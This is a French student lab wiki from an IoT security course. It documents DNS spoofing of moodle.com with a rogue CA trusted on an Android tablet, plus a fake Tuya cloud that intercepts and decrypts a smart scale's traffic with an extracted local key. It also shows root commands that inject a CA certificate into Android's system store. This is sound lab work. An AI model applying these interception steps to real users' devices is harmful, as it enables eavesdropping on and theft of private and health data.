0000 - 01 00 00 3a 03 03 42 41-6f 68 42 41 6f 68 62 6d ...:..BAohBAohbm
0010 - 64 36 61 47 39 31 49 46-52 31 65 56 6a 61 47 35 d6aG91IFR1eVjaG5
0020 - 76 62 47 39 53 42 00 00-04 00 ae 00 ff 01 00 00 vbG9SB..........
0030 - 0d 00 01 00 01 02 00 16-00 00 00 17 00 00 ..............
write to 0x55b0357c45c0 [0x55b0357e4430] (7 bytes => 7 (0x7))
0000 - 15 03 03 00 02 02 28 ......(
ERROR
801B7259B87F0000:error:0A0000C1:SSL routines:tls_post_process_client_hello:no shared cipher:../ssl/statem/statem_srvr.c:2220:
shutting down SSL
CONNECTION CLOSED
read from 0x55b0357c2410 [0x55b0357db203] (5 bytes => 5 (0x5))
0000 - 16 03 03 00 3e ....>
read from 0x55b0357c2410 [0x55b0357db208] (62 bytes => 62 (0x3E))
0000 - 01 00 00 3a 03 03 42 41-6f 68 42 41 6f 68 62 6d ...:..BAohBAohbm
0010 - 64 36 61 47 00 00 00 00-00 00 00 00 00 00 00 00 d6aG............
0020 - 00 00 00 00 00 00 00 00-04 00 ae 00 ff 01 00 00 ................
0030 - 0d 00 01 00 01 02 00 16-00 00 00 17 00 00 ..............
write to 0x55b0357c2410 [0x55b0357e4430] (7 bytes => 7 (0x7))
0000 - 15 03 03 00 02 02 28 ......(
ERROR
801B7259B87F0000:error:0A0000C1:SSL routines:tls_post_process_client_hello:no shared cipher:../ssl/statem/statem_srvr.c:2220:
shutting down SSL
CONNECTION CLOSED
read from 0x55b0357c1930 [0x55b0357db203] (5 bytes => 5 (0x5))
0000 - 16 03 03 00 3e ....>
read from 0x55b0357c1930 [0x55b0357db208] (62 bytes => 62 (0x3E))
0000 - 01 00 00 3a 03 03 42 41-6f 68 42 41 6f 68 62 6d ...:..BAohBAohbm
0010 - 64 36 61 47 39 31 49 46-52 31 65 56 6a 61 47 35 d6aG91IFR1eVjaG5
0020 - 76 62 47 39 53 42 00 00-04 00 ae 00 ff 01 00 00 vbG9SB..........
0030 - 0d 00 01 00 01 02 00 16-00 00 00 17 00 00 ..............
write to 0x55b0357c1930 [0x55b0357e4430] (7 bytes => 7 (0x7))
0000 - 15 03 03 00 02 02 28 ......(
ERROR
801B7259B87F0000:error:0A0000C1:SSL routines:tls_post_process_client_hello:no shared cipher:../ssl/statem/statem_srvr.c:2220:
shutting down SSL
CONNECTION CLOSED
</syntaxhighlight>trouver un mdp dans l'appli nedis /data/data/com.nedis.smartlife/shared_prefs

decouverte de tinytuya : https://github.com/jasonacox/tinytuya<syntaxhighlight lang="python3">
import socket
import tinytuya
import json

LOCAL_KEY = '674d29fb978a1705'

IP_BALANCE = '172.16.10.105'

print(f"[*] Démarrage du Faux Cloud Tuya...")
print(f"[*] Clé utilisée : {LOCAL_KEY}")

server_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
server_socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
server_socket.bind(('0.0.0.0', 8886))
server_socket.listen(1)

print("[*] En attente de la balance sur le port 8886...")
print("[*] Monte sur la balance maintenant !")

while True:
try:
client, addr = server_socket.accept()
print(f"\n[+] Connexion reçue de {addr[0]} !")

data = client.recv(4096)

if data:
print(f"[i] {len(data)} octets reçus (chiffrés). Tentative de décodage...")

try:
d = tinytuya.OutletDevice('DUMMY_ID', IP_BALANCE, LOCAL_KEY)
d.set_version(3.3) # Version standard WiFi

decrypted = d._decode_payload(data)

if decrypted:
print("\n" + "="*40)
print("donnés :")
print("="*40)
parsed = json.loads(decrypted)
print(json.dumps(parsed, indent=4))

if 'dps' in parsed:
print("\nVALEURS :")
for k, v in parsed['dps'].items():
print(f"- Data Point {k} : {v}")
print("="*40)
else:
print("[-] Échec du décryptage (Format inconnu ou clé incorrecte pour ce paquet)")

except Exception as e:
print(f"[-] Erreur de décodage : {e}")

client.close()

except KeyboardInterrupt:
print("\nArrêt.")
break
except Exception as e:
print(f"Erreur serveur : {e}")
</syntaxhighlight>adb shell

su

cd /data/adb/modules/

mkdir -p tuya_cert/system/etc/security/cacerts

echo "id=tuya_cert" > tuya_cert/module.prop echo "name=Tuya Certificate Injection" >> tuya_cert/module.prop echo "version=1.0" >> tuya_cert/module.prop echo "versionCode=1" >> tuya_cert/module.prop echo "author=Toi" >> tuya_cert/module.prop echo "description=Injecte le certificat Tuya dans le systeme" >> tuya_cert/module.prop

touch tuya_cert/auto_mount

cp /sdcard/Download/26e33623.0 /data/adb/modules/tuya_cert/system/etc/security/cacerts/

chmod 644 /data/adb/modules/tuya_cert/system/etc/security/cacerts/26e33623.0

chown root:root /data/adb/modules/tuya_cert/system/etc/security/cacerts/26e33623.0

reboot

SE5 IdO sécurité des objets 2025/2026 b1

2025-12-02T15:50:11Z

Vdetrez : /* Nedis Wi-Fi Smart Personal Scales */

[[Fichier:1107px-Titre page.png|sans_cadre|820x820px]]

= Serveur virtuel (17/09) =
Dans un premier temps, on vient créer un serveur virtuel sur <code>capbreton</code> avec la commande <code>xen-create-image --hostname=SE5.vdetrez --dhcp --dir=/usr/local/xen --size=10G --memory=2G --dist=daedalus --bridge=bridgeStudents</code>

Ensuite, sur capbreton dans le dossier <code>/etc/network/interfaces.d</code> on vient créer un fichier <code>g1_vdetrez</code> pour mettre en place une nouvelle interface dans le VLAN 410. <syntaxhighlight lang="linux-config">
auto Trunk.410
iface Trunk.410 inet manual
vlan-raw-device Trunk
up ip link set $IFACE up
down ip link set $IFACE down

auto g1_vdetrez
iface g1_vdetrez inet manual
bridge_ports Trunk.410
up ip link set $IFACE up
down ip link set $IFACE down

</syntaxhighlight>

On a maintenant accès à la machine SE5.vdetrez (en ayant évidemment fait l'erreur de mettre "." à la place de "-") et on vient y configurer nos adresses IPv4.

Mon adresse IPv4 routée est la <code>172.26.145.100</code> et mon IPv4 dans le VLAN 410 est <code>172.16.10.0</code> <syntaxhighlight lang="linux-config">
# This file describes the network interfaces available on your system
# and how to activate them. For more information, see interfaces(5).

# The loopback network interface
auto lo
iface lo inet loopback

# The primary network interface
auto eth0
iface eth0 inet static
address 172.26.145.110
netmask 255.255.255.0
gateway 172.26.145.251
# post-up ethtool -K eth0 tx off

auto eth1
iface eth1 inet static
address 172.16.10.0/24
#
# The commented out line above will disable TCP checksumming which
# might resolve problems for some users. It is disabled by default
#

</syntaxhighlight>

On vérifie avec la commande <code>ip a</code><syntaxhighlight lang="linux-config">
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP group default qlen 1000
link/ether 00:16:3e:23:74:41 brd ff:ff:ff:ff:ff:ff
inet 172.26.145.110/24 brd 172.26.145.255 scope global eth0
valid_lft forever preferred_lft forever
inet6 2001:660:4401:6050:216:3eff:fe23:7441/64 scope global dynamic mngtmpaddr
valid_lft 853sec preferred_lft 753sec
inet6 2a01:c916:2047:c850:216:3eff:fe23:7441/64 scope global dynamic mngtmpaddr
valid_lft 2591853sec preferred_lft 604653sec
inet6 fe80::216:3eff:fe23:7441/64 scope link
valid_lft forever preferred_lft forever
3: eth1: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP group default qlen 1000
link/ether 00:16:3e:23:74:42 brd ff:ff:ff:ff:ff:ff
inet 172.16.10.0/24 brd 172.16.10.255 scope global eth1
valid_lft forever preferred_lft forever
inet6 fe80::216:3eff:fe23:7442/64 scope link
valid_lft forever preferred_lft forever

</syntaxhighlight>

Et on constate que notre serveur a accès à Internet avec la commande <code>ping 8.8.8.8</code>

= Point d'accès WiFi (29/09) =
Pour l'instant, nous mettons de côté ce point du TP car il n'est pas utile pour la suite.

= Sécurisation WiFi par WPA2-PSK =

Pour communiquer avec le routeur <code>Cisco</code>, on branche le port série en USB et on se connecte avec la commande <code>minicom -D /dev/ttyUSB0 -b 9600</code>. La première étape fut la création du SSID <code>SE5-SSID10</code>.<syntaxhighlight lang="linux-config">
dot11 ssid SE5-SSID10

vlan 410

authentication open

authentication key-management wpa version 2

wpa-psk ascii Cisco2025

exit
</syntaxhighlight>
Puis, on configure l'interface <code>Dot11Radio0</code><syntaxhighlight lang="linux-config">
interface dot11radio 0

encryption mode ciphers aes-ccm

ssid SE5-SSID10

station-role root

no shutdown
</syntaxhighlight>Après cela, on retourne sur notre serveur virtuel et on y implémente un serveur DHCP pour l'attribution des IP aux machines se connectant sur le routeur. On retrouve cette configuration dans <code>/etc/dhcp/dhcpd.conf</code><syntaxhighlight lang="linux-config">
# dhcpd.conf

option domain-name "plil.info";
option domain-name-servers ns.plil.info;

default-lease-time 600;
max-lease-time 7200;

ddns-update-style none;

authoritative;

subnet 172.16.10.0 netmask 255.255.255.0 {
range 172.16.10.100 172.16.10.200;
option domain-name-servers 172.16.10.1;
option routers 172.16.10.1;
default-lease-time 600;
max-lease-time 7200;
}
</syntaxhighlight>Puis, on implémente un serveur DNS minimal dans le fichier <code>/etc/bind/named.conf.options</code><syntaxhighlight lang="linux-config">
options {
directory "/var/cache/bind";

recursion yes;
allow-query {172.16.10.0/24; 127.0.0.1;};

forwarders {
8.8.8.8;
1.1.1.1;
};

dnssec-validation auto;

listen-on {127.0.0.1; 172.16.10.1;};
listen-on-v6 { none; };
};
</syntaxhighlight>Et enfin, on met en place une mascarade entre le VLAN 410 et le routeur du réseau des salles de projets pour donner l'accès à Internet.<syntaxhighlight lang="linux-config">
Chain PREROUTING (policy ACCEPT 0 packets, 0 bytes)
pkts bytes target prot opt in out source destination

Chain INPUT (policy ACCEPT 0 packets, 0 bytes)
pkts bytes target prot opt in out source destination

Chain OUTPUT (policy ACCEPT 0 packets, 0 bytes)
pkts bytes target prot opt in out source destination

Chain POSTROUTING (policy ACCEPT 0 packets, 0 bytes)
pkts bytes target prot opt in out source destination
385 133K MASQUERADE 0 -- * eth0 172.16.10.0/24 0.0.0.0/0
0 0 MASQUERADE 0 -- * eth0 172.16.10.0/24 0.0.0.0/0
</syntaxhighlight>

= Interception de flux (30/09) =

== Redirection par DNS ==
Pour cette partie, on va ajouter une zone primaire à notre serveur DNS avec le nom Internet du site que l'on veut rediriger vers notre machine.

Ici, ce sera le merveilleux <code>moodle.com</code>

D'abord, on modifie <code>/etc/bind/named.conf.local</code><syntaxhighlight lang="linux-config">
//
// Do any local configuration here
//

// Consider adding the 1918 zones here, if they are not used in your
// organization
//include "/etc/bind/zones.rfc1918";

zone "moodle.com" {
type master;
file "/etc/bind/db.moodle.com";
};
</syntaxhighlight>Puis, on crée la fameuse zone <code>db.moodle.com</code> dans le même répertoire <syntaxhighlight lang="linux-config">
$TTL 200
@ IN SOA ns.moodle.com. admin.moodle.com. (
5 ;
3600 ;
1800 ;
604800 ;
86400 ;
)
IN NS ns.moodle.com.
ns IN A 172.16.10.1
@ IN A 172.16.10.1
www IN CNAME ns
</syntaxhighlight>Pour vérifier si notre configuration est correcte, on exécute ces deux commandes :

<code>sudo named-checkconf</code>

<code>sudo named-checkzone moodle.com /etc/bind/db.moodle.com</code>

== Redirection réseau ==
Dans cette partie, on ajoute une règle <code>iptables</code> pour rediriger le flux TCP vers un port local, le <code>8080</code>.

<code>iptables -t nat -A PREROUTING -i eth0 -p tcp --dport 80 -j REDIRECT --to-ports 8080</code><syntaxhighlight lang="linux-config">
Chain PREROUTING (policy ACCEPT 0 packets, 0 bytes)
pkts bytes target prot opt in out source destination
0 0 REDIRECT 6 -- eth0 * 0.0.0.0/0 0.0.0.0/0 tcp dpt:80 redir ports 8080

Chain INPUT (policy ACCEPT 0 packets, 0 bytes)
pkts bytes target prot opt in out source destination

Chain OUTPUT (policy ACCEPT 0 packets, 0 bytes)
pkts bytes target prot opt in out source destination

Chain POSTROUTING (policy ACCEPT 0 packets, 0 bytes)
pkts bytes target prot opt in out source destination
385 133K MASQUERADE 0 -- * eth0 172.16.10.0/24 0.0.0.0/0
0 0 MASQUERADE 0 -- * eth0 172.16.10.0/24 0.0.0.0/0
</syntaxhighlight>

== Serveur apache sécurise (04/10) ==

Dans un premier temps, on va créer un certificat auto-signé :

<code>openssl req -x509 -nodes -days 365 -newkey rsa:2048 -keyout /etc/ssl/apache/apache-selfsigned.key -out /etc/ssl/apache/apache-selfsigned.crt -subj "/C=FR/ST=Nord/L=Lille/O=Popo/CN=moodle.com"</code>

Puis, on configure <code>Apache2</code>
<syntaxhighlight lang="linux-config">
GNU nano 7.2 /etc/apache2/sites-available/secure-site.conf
<VirtualHost *:443>
ServerName moodle.com

DocumentRoot /var/www/html

SSLEngine on
SSLCertificateFile /etc/ssl/apache/apache.crt
SSLCertificateKeyFile /etc/ssl/apache/apache.key

# Optionnel : log
ErrorLog ${APACHE_LOG_DIR}/ssl-error.log
CustomLog ${APACHE_LOG_DIR}/ssl-access.log combined
</VirtualHost>

# Redirection HTTP ^f^r HTTPS
<VirtualHost *:80>
ServerName moodle.com
Redirect permanent / https://moodle.com/
</VirtualHost>
</syntaxhighlight>

Maintenant, en prévision de la suite (voir explication dans Machine virtuelle Android), on va créer une autorité de certification nommée CertiFiable :

<code>openssl req -x509 -new -nodes -keyout ca.key -sha256 -days 365 -out ca.crt -subj "/CN=CertiFiable"</code>

Puis, on vient générer une demande de signature de certificat :

<code>openssl req -new -newkey rsa:2048 -nodes -keyout apache.key -out apache.csr -subj "/CN=moodle.com"</code>

Enfin, on vient signer le site avec le certificat de CertiFiable :

<code>openssl x509 -req -in apache.csr -CA ca.crt -CAkey ca.key -CAcreateserial -out apache.crt -days 365 -sha256</code>

= Machine virtuelle <code>android</code> =

== Première tentative ==
Actuellement, si on navigue sur internet et que l'on se rend sur moodle.com, on atterrit bien sûr le faux Moodle, mais comme le téléphone ne connait pas l'autorité de certification nommé CertiFiable, on a le droit à ce magnifique message de connexion non sécurisée :

[[Fichier:Avertissement moodle.png|sans_cadre]][[Fichier:Moodle le magnifique.png|sans_cadre]]

Malheureusement, il est aujourd'hui impossible d'ajouter facilement une autorité de certification sur son téléphone.

C'est pour cela qu'une solution proposée est d'installer une machine virtuelle d'une ancienne version d'<code>Android</code> où il était possible d'en ajouter.

En ayant suivi ce tuto (https://help.clouding.io/hc/en-us/articles/4405454393756-How-to-virtualize-Android-with-QEMU-KVM), j'ai réussi à installer une VM sur Zabeth4 (j'ai dû prendre une autre iso car celle du site était inaccessible).

J'ai installé <code>VNC Viewer</code> pour pouvoir manipuler la machine virtuelle.

En étant sur la VM, j'ai pu me rendre compte qu'il n'était pas possible de se connecter au WiFi, c'est la connexion du pc qui est simulé comme un réseau WiFi dans la VM.

J'ai pu réfléchir à deux solutions avant que la VM ne crash d'elle-même et soit impossible à redémarrer...

La première est toute simple, connecter la Zabeth directement au WiFi, ce qui est difficile à distance. La seconde, qui est je pense possible, est de changer la carte réseau dans les fichiers de conf de la VM pour mettre celle supportant le WiFi.

Je n'ai donc pu tester aucune de ces deux solutions, la VM n'étant plus.

== Seconde tentative ==

qemu-system-x86_64 -net nic -net user -m 1024 -enable-kvm -display sdl -drive file=android.img,format=raw

qemu-system-x86_64 -net nic -net user -m 1024 -enable-kvm -display sdl -drive file=android.img,format=raw -cdrom *android-x86*.iso -boot d

qemu-system-x86_64 -m 2048 -enable-kvm -cpu host -smp 2 -display sdl -drive file=android.img,format=raw,if=virtio -usb -device usb-host,vendorid=0x148f,productid=0x5370

== Ultime tentative ==
//TO DO Ajouter méthode routage android Android studio.

= Machine <code>android</code> (06/10) =
Pour cette dernière partie, j'ai retrouvé une tablette sous <code>Android 4.4 KitKat</code> qui permet d'ajouter des autorités de certification.

C'est donc ce que j'ai fait :

[[Fichier:Photo_certifiable.png|sans_cadre]]

Maintenant, on constate en se connectant sur moodle.com à partir de cette tablette que l'on est bien redirigé vers le faux site et qu'il est sécurisé avec le magnifique cadenas vert.

[[Fichier:Photo moodle.png|sans_cadre]]

(cette page web date du 06/10/25, elle n'est plus valable depuis le 10/10/25...)

= Nedis Wi-Fi Smart Personal Scales =

Dans ce second TP, nous allons jouer avec ce pèse personne de nedis.

Dans un premier temps, j'ai connecté la balance au résau SE5-SSID10.

Puis j'ai remarqué que quand je tentai de me peser, la balance affiche err2.

Après une courte investigation, il s'agit d'une balance qui émet des signaux électriques pour analyser la composition corporelle donc si on se pèse avec des chaussures, cela pose problème.

Pour la suite du projet, on se pèsera avec les mains.

[[Fichier:Poid_sur_app_nedis.png|sans_cadre]]

On constate sur ces paquets la requête de la balance pour obtenir une IP, puis le moment ou elle l'obtient. A chaque fois qu'elle redémarre, elle vient récupérer une IP, elle n'aura donc pas forcement la 105.

[[Fichier:WS connection balance.png|sans_cadre|858x858px]]

Je peux donc ping ma balance depuis mon pc (celui qui host ma vm)

[[Fichier:PIng balance.png|sans_cadre]]

tcpdump -i eth1 -n port 53:<syntaxhighlight lang="linux-config">
14:46:51.115996 IP 172.16.10.105.49153 > 172.16.10.1.53: 13861+ A? m2.tuyaeu.com. (31)
14:46:51.125611 IP 172.16.10.1.53 > 172.16.10.105.49153: 13861 3/0/0 A 3.120.92.134, A 18.184.31.90, A 35.156.44.172 (79)
14:46:51.168250 IP 172.16.10.105.49153 > 172.16.10.1.53: 59035+ A? a3.tuyaeu.com. (31)
14:46:51.177967 IP 172.16.10.1.53 > 172.16.10.105.49153: 59035 3/0/0 A 18.198.62.99, A 18.158.227.228, A 3.67.116.46 (79)
14:46:51.703179 IP 172.16.10.102.57661 > 172.16.10.1.53: 30982+ AAAA? a1.tuyaeu.com. (31)
14:46:51.706085 IP 172.16.10.102.57662 > 172.16.10.1.53: 15654+ A? a1.tuyaeu.com. (31)
14:46:51.713159 IP 172.16.10.1.53 > 172.16.10.102.57661: 30982 3/0/0 AAAA 2a05:d014:afa:af02:262a:be09:e328:ff21, AAAA 2a05:d014:afa:af01:87dc:dc67:35a1:5bfe, AAAA 2a05:d014:afa:af00:1ee2:1f00:e061:e8bf (115)
14:46:51.715736 IP 172.16.10.1.53 > 172.16.10.102.57662: 15654 3/0/0 A 3.78.92.3, A 35.159.150.3, A 3.121.33.91 (79)

56 packets captured
56 packets received by filter
0 packets dropped by kernel
[4343449.827028] device eth1 left promiscuous mode

</syntaxhighlight>visiblement notre balance communque avec tuya via m2.tuyaeu.com et a3.tuyaeu.com

et la vm android a1.tuyaeu.com

tcpdump -i eth1 -n port 53: après avoir crée dns, site, etc a1.tuyaeu.com<syntaxhighlight lang="linux-config">
root@SE5:/etc/apache2/sites-available# tcpdump -i eth1 -n port 53
[5544865.540418] device eth1 entered promiscuous mode
tcpdump: verbose output suppressed, use -v[v]... for full protocol decode
listening on eth1, link-type EN10MB (Ethernet), snapshot length 262144 bytes
12:30:55.146437 IP 172.16.10.1.53 > 172.16.10.100.17620: 23156 5/0/0 CNAME reddit.map.fastly.net., A 151.101.129.140, A
151.101.1.140, A 151.101.65.140, A 151.101.193.140 (129)
12:30:55.168796 IP 172.16.10.1.53 > 172.16.10.100.24249: 64622 2/0/0 CNAME us-central1-gcp.api.sc-gw.com., A 35.190.43.
134 (109)
12:30:55.322498 IP 172.16.10.100.26394 > 172.16.10.1.53: 29420+ A? scontent-cdg4-1.xx.fbcdn.net. (46)
12:30:56.095075 IP 172.16.10.100.62675 > 172.16.10.1.53: 46396+ A? cf-st.sc-cdn.net. (34)
12:30:56.121796 IP 172.16.10.1.53 > 172.16.10.100.62675: 46396 1/0/0 A 3.163.248.4 (50)
12:30:56.539099 IP 172.16.10.1.53 > 172.16.10.100.26394: 29420 1/0/0 A 185.60.219.2 (62)
12:30:57.289763 IP 172.16.10.100.7071 > 172.16.10.1.53: 14247+ A? usc1-gcp-v62.api.snapchat.com. (47)
12:30:57.302767 IP 172.16.10.1.53 > 172.16.10.100.7071: 14247 2/0/0 CNAME usc1-gcp-v62.api.sc-gw.com., A 34.120.159.232
(103)
12:30:58.490060 IP 172.16.10.105.49153 > 172.16.10.1.53: 50294+ A? m2.tuyaeu.com. (31)
12:30:58.490174 IP 172.16.10.1.53 > 172.16.10.105.49153: 50294* 2/0/0 CNAME ns.tuyaeu.com., A 172.16.10.1 (64)
12:30:58.540041 IP 172.16.10.105.49153 > 172.16.10.1.53: 23785+ A? a3.tuyaeu.com. (31)
12:30:58.540132 IP 172.16.10.1.53 > 172.16.10.105.49153: 23785* 2/0/0 CNAME ns.tuyaeu.com., A 172.16.10.1 (64)
12:31:00.979103 IP 172.16.10.100.63625 > 172.16.10.1.53: 63574+ A? gql-fed.reddit.com. (36)
12:31:00.997721 IP 172.16.10.1.53 > 172.16.10.100.63625: 63574 5/0/0 CNAME reddit.map.fastly.net., A 151.101.65.140, A
151.101.129.140, A 151.101.193.140, A 151.101.1.140 (135)
12:31:04.461507 IP 172.16.10.102.63971 > 172.16.10.1.53: 20792+ A? discord.com. (29)
12:31:04.461519 IP 172.16.10.102.54572 > 172.16.10.1.53: 15444+ Type65? discord.com. (29)
12:31:04.493098 IP 172.16.10.1.53 > 172.16.10.102.63971: 20792 5/0/0 A 162.159.138.232, A 162.159.136.232, A 162.159.12
8.233, A 162.159.135.232, A 162.159.137.232 (109)
12:31:04.493306 IP 172.16.10.1.53 > 172.16.10.102.54572: 15444 1/0/5 Type65 (158)
18 packets captured
18 packets received by filter
0 packets dropped by kernel

</syntaxhighlight>tcpdump -i eth1 host 172.16.10.105 and not port 53 -A<syntaxhighlight lang="linux-config">
tcpdump: verbose output suppressed, use -v[v]... for full protocol decode
listening on eth1, link-type EN10MB (Ethernet), snapshot length 262144 bytes
12:36:41.148741 IP 172.16.10.0.bootps > 172.16.10.105.bootpc: BOOTP/DHCP, Reply, length 300
E..H..........
...
i.C.D.4......<\)...........
i..........|.-L........................................................................................................
..................................................................................................c.Sc5..6...
.3....X..........
.....
.. plil.info................
12:36:41.161323 IP 172.16.10.0.bootps > 172.16.10.105.bootpc: BOOTP/DHCP, Reply, length 300
E..H..........
...
i.C.D.4g.....[.}T..........
i..........|.-L........................................................................................................
..................................................................................................c.Sc5..6...
.3....X..........
.....
.. plil.info................
12:36:41.167616 ARP, Request who-has 172.16.10.105 tell 0.0.0.0, length 46
..........|.-L............
i....P....Y...c....
12:36:41.490919 ARP, Request who-has 172.16.10.105 tell 0.0.0.0, length 46
..........|.-L............
i.r.u....).........
12:36:41.993612 ARP, Request who-has 172.16.10.105 tell 172.16.10.105, length 46
..........|.-L..
i........
i..HE.....f........
12:36:42.011664 ARP, Request who-has 172.16.10.1 tell 172.16.10.105, length 46
..........|.-L..
i........
.....up. ..........
12:36:42.011672 ARP, Reply 172.16.10.1 is-at 00:16:3e:23:74:42 (oui Unknown), length 28
..........>#tB..
...|.-L..
i
12:36:42.019053 IP 172.16.10.105.3872 > 172.16.10.1.8886: Flags [S], seq 6509, win 4380, options [mss 1460], length 0
E..,......O>..
i..
.. "....m....`....<........
12:36:42.019100 IP 172.16.10.1.8886 > 172.16.10.105.3872: Flags [R.], seq 0, ack 6510, win 0, length 0
E..(..@.@..E..
...
i".. .......nP.......
12:36:42.070419 IP 172.16.10.105.17034 > 172.16.10.1.https: Flags [S], seq 6509, win 4380, options [mss 1460], length 0
E..,......O<..
i..
.B......m....`...........<.
12:36:42.070442 IP 172.16.10.1.https > 172.16.10.105.17034: Flags [S.], seq 3767910189, ack 6510, win 64240, options [m
ss 1460], length 0
E..,..@.@..A..
...
i..B....-...n`...l.......
12:36:42.077437 IP 172.16.10.105.17034 > 172.16.10.1.https: Flags [.], ack 1, win 4380, length 0
E..(......O?..
i..
.B......n....P...4......
..
12:36:42.079986 IP 172.16.10.105.17034 > 172.16.10.1.https: Flags [P.], seq 1:68, ack 1, win 4380, length 67
E..k......N...
i..
.B......n....P...........>...:..BAohBAohbmd6aG91IFR1eVjaG5vbG9SB........................
12:36:42.080012 IP 172.16.10.1.https > 172.16.10.105.17034: Flags [.], ack 68, win 64173, length 0
E..(..@.@.....
...
i..B.........P...l...
12:36:42.080447 IP 172.16.10.1.https > 172.16.10.105.17034: Flags [P.], seq 1:8, ack 68, win 64173, length 7
E../..@.@.....
...
i..B.........P...l.........(
12:36:42.080533 IP 172.16.10.1.https > 172.16.10.105.17034: Flags [F.], seq 8, ack 68, win 64173, length 0
E..(..@.@.....
...
i..B....5....P...l...
12:36:42.101652 IP 172.16.10.105.17034 > 172.16.10.1.https: Flags [.], ack 8, win 4373, length 0
E..(. ....O<..
i..
.B..........5P...4s........
12:36:42.102116 IP 172.16.10.105.17034 > 172.16.10.1.https: Flags [R.], seq 68, ack 8, win 4380, length 0
E..(.
....O;..
i..
.B..........5P...4h.....
..
12:36:43.025368 IP 172.16.10.105.23869 > 172.16.10.1.8886: Flags [S], seq 6511, win 4380, options [mss 1460], length 0
E..,......O6..
i..
.]="....o....`............9
12:36:43.025387 IP 172.16.10.1.8886 > 172.16.10.105.23869: Flags [R.], seq 0, ack 6512, win 0, length 0
E..(..@.@..E..
...
i".]=.......pP.......
12:36:44.025225 IP 172.16.10.105.22317 > 172.16.10.1.8886: Flags [S], seq 6513, win 4380, options [mss 1460], length 0
E..,......O5..
i..
.W-"....q....`....+........
12:36:44.025269 IP 172.16.10.1.8886 > 172.16.10.105.22317: Flags [R.], seq 0, ack 6514, win 0, length 0
E..(..@.@..E..
...
i".W-.......rP.......
12:36:45.025301 IP 172.16.10.105.31465 > 172.16.10.1.8886: Flags [S], seq 6517, win 4380, options [mss 1460], length 0
E..,......O4..
i..
.z."....u....`...ck......E.
12:36:45.025318 IP 172.16.10.1.8886 > 172.16.10.105.31465: Flags [R.], seq 0, ack 6518, win 0, length 0
E..(..@.@..E..
...
i".z........vP....0..
12:36:46.025500 IP 172.16.10.105.9070 > 172.16.10.1.8886: Flags [S], seq 6521, win 4380, options [mss 1460], length 0
E..,......O3..
i..
.#n"....y....`.............
12:36:46.025517 IP 172.16.10.1.8886 > 172.16.10.105.9070: Flags [R.], seq 0, ack 6522, win 0, length 0
E..(..@.@..E..
...
i".#n.......zP.......
12:36:47.033189 IP 172.16.10.105.51179 > 172.16.10.1.8886: Flags [S], seq 6527, win 4380, options [mss 1460], length 0
E..,......O2..
i..
...".........`...._......y.
12:36:47.033206 IP 172.16.10.1.8886 > 172.16.10.105.51179: Flags [R.], seq 0, ack 6528, win 0, length 0
E..(..@.@..E..
...
i"...........P...?$..
12:36:47.263020 ARP, Request who-has 172.16.10.105 tell 172.16.10.1, length 28
..........>#tB..
.........
i
12:36:48.287049 ARP, Request who-has 172.16.10.105 tell 172.16.10.1, length 28
..........>#tB..
.........
i
12:36:48.653641 IP 172.16.10.0.bootps > 172.16.10.105.bootpc: BOOTP/DHCP, Reply, length 300
E..H..........
...
i.C.D.4B...................
i..........|.-L........................................................................................................
..................................................................................................c.Sc5..6...
.3....Q..........
.....
.. plil.info................
12:36:48.663352 IP 172.16.10.0.bootps > 172.16.10.105.bootpc: BOOTP/DHCP, Reply, length 300
E..H..........
...
i.C.D.4.L.......p..........
i..........|.-L........................................................................................................
..................................................................................................c.Sc5..6...
.3....Q..........
.....
.. plil.info................
12:36:48.674677 ARP, Request who-has 172.16.10.105 tell 0.0.0.0, length 46
..........|.-L............
i>#tB./..P.........
12:36:48.993649 ARP, Request who-has 172.16.10.105 tell 0.0.0.0, length 46
..........|.-L............
ir...P.............
12:36:49.311055 ARP, Request who-has 172.16.10.105 tell 172.16.10.1, length 28
..........>#tB..
.........
i
12:36:49.490922 ARP, Request who-has 172.16.10.105 tell 172.16.10.105, length 46
..........|.-L..
i........
i.......x....D.....
12:36:49.492262 ARP, Reply 172.16.10.105 is-at a4:e5:7c:16:2d:4c (oui Unknown), length 46
..........|.-L..
i..>#tB..
...................
12:36:49.515651 IP 172.16.10.105.29415 > 172.16.10.1.8886: Flags [S], seq 6536, win 4380, options [mss 1460], length 0
E..,......O...
i..
.r.".........`...kZ........
12:36:49.515669 IP 172.16.10.1.8886 > 172.16.10.105.29415: Flags [R.], seq 0, ack 6537, win 0, length 0
E..(..@.@..E..
...
i".r.........P.......
12:36:49.518628 IP 172.16.10.105.31325 > 172.16.10.1.https: Flags [S], seq 6539, win 4380, options [mss 1460], length 0
E..,......O-..
i..
.z]..........`.............
12:36:49.518648 IP 172.16.10.1.https > 172.16.10.105.31325: Flags [S.], seq 1378912894, ack 6540, win 64240, options [m
ss 1460], length 0
E..,..@.@..A..
...
i..z]R0.~....`...l.......
12:36:49.523505 IP 172.16.10.105.31325 > 172.16.10.1.https: Flags [.], ack 1, win 4380, length 0
E..(......O0..
i..
.z]......R0..P........a3.tu
12:36:49.527055 IP 172.16.10.105.31325 > 172.16.10.1.https: Flags [P.], seq 1:68, ack 1, win 4380, length 67
E..k......N...
i..
.z]......R0..P...G?......>...:..BAohBAohbmd6aG91IFR1eVjaG5vbG9SB........................
12:36:49.527081 IP 172.16.10.1.https > 172.16.10.105.31325: Flags [.], ack 68, win 64173, length 0
E..(..@.@..X..
...
i..z]R0......P...l...
12:36:49.527462 IP 172.16.10.1.https > 172.16.10.105.31325: Flags [P.], seq 1:8, ack 68, win 64173, length 7
E../..@.@..P..
...
i..z]R0......P...l.........(
12:36:49.527530 IP 172.16.10.1.https > 172.16.10.105.31325: Flags [F.], seq 8, ack 68, win 64173, length 0
E..(..@.@..V..
...
i..z]R0......P...l...
12:36:49.569636 IP 172.16.10.105.31325 > 172.16.10.1.https: Flags [.], ack 8, win 4373, length 0
E..(......O...
i..
.z]......R0..P..........C.@
12:36:49.574893 IP 172.16.10.105.31325 > 172.16.10.1.https: Flags [R.], seq 68, ack 8, win 4380, length 0
E..(......O-..
i..
